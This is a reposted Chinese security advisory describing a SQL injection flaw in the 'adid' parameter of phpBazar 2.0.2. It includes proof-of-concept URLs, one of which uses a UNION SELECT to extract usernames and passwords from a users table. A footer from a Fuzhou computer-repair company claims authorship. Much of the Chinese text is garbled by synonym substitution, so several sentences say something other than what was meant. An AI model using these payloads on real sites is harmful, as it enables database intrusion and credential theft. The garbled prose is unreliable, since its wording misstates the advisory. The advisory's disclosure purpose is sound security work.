PhpBazar adid SQL注入漏洞

  phpBazar ’adid’ SQL注入漏洞 
  影响版本: 
  SmartISoft phpBazar 2.0.2 
  描述: 
  BUGTRAQ ID: 30773 
  CNCAN ID：CNCAN-2008082206 
  phpBazar是一款基于PHP的WEB应用步伐。 
  phpBazar不正确过滤用户提交的输出，远程攻击者可以利用漏洞举行SQL注入攻击，得到敏感信息或操纵数据库。 
  题目是脚本对用户提交的’adid’参数短少过滤，提反目意SQL查询作为参数数据，可变动原来的SQL逻辑，得到敏感信息或操纵数据库。 
  <* 参考 
  http://www.securityfocus.com/bid/30773 
  *> 
  SEBUG宁静发起: 
  现在没有解决方案提供： 
  http://www.smartisoft.com/ 
  测试要领: 
  以下步伐(要领)可能带有攻击性,仅供宁静研究与讲授之用,危害自负! 
  http://www.example.com/bazar/classified.php?catid=x&;subcatid=x&adid=x SQL INJECTION 
  http://www.example.com/bazar/classified.php?catid=2&;subcatid=5&adid=832 union select sum(somecolumn) from users-- 
  http://www.example.com/bazar/classified.php?catid=2&;subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 
  39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：